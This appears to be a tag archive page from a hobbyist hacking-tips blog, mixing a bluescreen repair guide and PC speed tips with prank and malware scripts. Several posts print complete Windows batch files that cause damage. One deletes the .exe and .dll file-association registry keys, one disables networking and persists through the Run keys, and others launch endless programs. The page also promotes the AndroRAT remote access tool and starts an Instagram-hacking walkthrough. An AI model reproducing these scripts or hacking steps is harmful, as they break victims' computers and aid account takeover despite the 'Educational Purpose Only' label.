DroidBox helps you to do all configuration tasks with one hand. Set an IP reservation or simply reboot the router? –Yes, it’s easy now. Set up VPN between two routers or configure firewall rules? – Yes, this can be done by DroidBox.You can even make desktop shortcuts for some of your favorite actions Download DroidboxContinue reading “BEST HACKING APPS FOR ANDROID USERS [Continue]”
Tag Archives: Tips/Tricks
FIX BLUESCREEN ERROR 0Xc0000001
1. Boot Windows From USB Drive 2. Select Language and Press Next 3. Click on Repair your Computer 4. Click on Troubleshoot 5. Select Advanced Options 6. Select Command Prompt 7. Type bootrec/fixmbr and Press Enter 8. Type bootrec/fixboot and Press Enter 9. Type bcdedit/export c:\bcdbackup andContinue reading “FIX BLUESCREEN ERROR 0Xc0000001”
BEST HACKING APPS FOR ANDROID USERS
1. ANDRORAT – Androrat is a client/server application developed in Java Android for the client-side and Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. It has been realized in one month. The goalContinue reading “BEST HACKING APPS FOR ANDROID USERS”
Application Bomber
Open up multiple Applications at once … @echo off 😡 start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x Save it as App.bat Warning: Don’t open it on your own PC (Educational Purpose Only)
POPPING UP CD DRIVE
Do you still remember that some Disc has this? If you try to copy a video or music by open it directly the this will happen? Your CD/DVD POP UP ENDLESSLY? Well, here how you can create it too using notepad.. Set oWMP = CreateObject(”WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1Continue reading “POPPING UP CD DRIVE”
Infinite Notepad Loop
In this post, i will give you a script which you can open an endless notepad @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Save as loop.bat Warning: Don’t open it on your own PC (Educational Purpose Only)
Delete Key Registry Files Notepad Script
@ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your System is Fucked up !! Hahahaha. GOTO MESSAGE Save as delete.batWarning : Don’t open it on your own PC(Educational Purpose Only)
Disable Internet Permanent Using Notepad Script
echo @echo off>c:windowswimn32.bat echo break off>c:windowswimn32.bat echo ipconfig/release_all>c:windowswimn32.bat echo end>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED! PAUSE Save as Virus.bat Warning : Don’t open it on your own PC (Educational Purpose Only)
How to turn on your computer fast
Here’s what you have to do to turn your PC ON in 10 seconds. You have to do the following steps:- 1.Click on the START button then, 2.Go to RUN. 3.type Regedit and hit Enter. 4.this will open Registery Editor5. Now look for the below key HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ ContentIndex 6.Now there find the Key Called “Startup Delay” Double Click On It. 7.NowContinue reading “How to turn on your computer fast”
HACK INSTAGRAM USING ANDROID DEVICES
1) Load up your android device. 2) Next click on your playstore app and search for “Termux” & install it. 3) Open Termux app and type: “pkg install git”. 4) To update available packages type: “pkg update”. 5) Lets install python by typing ” pkg install python” 6) We will need to download the tool we will be using forContinue reading “HACK INSTAGRAM USING ANDROID DEVICES”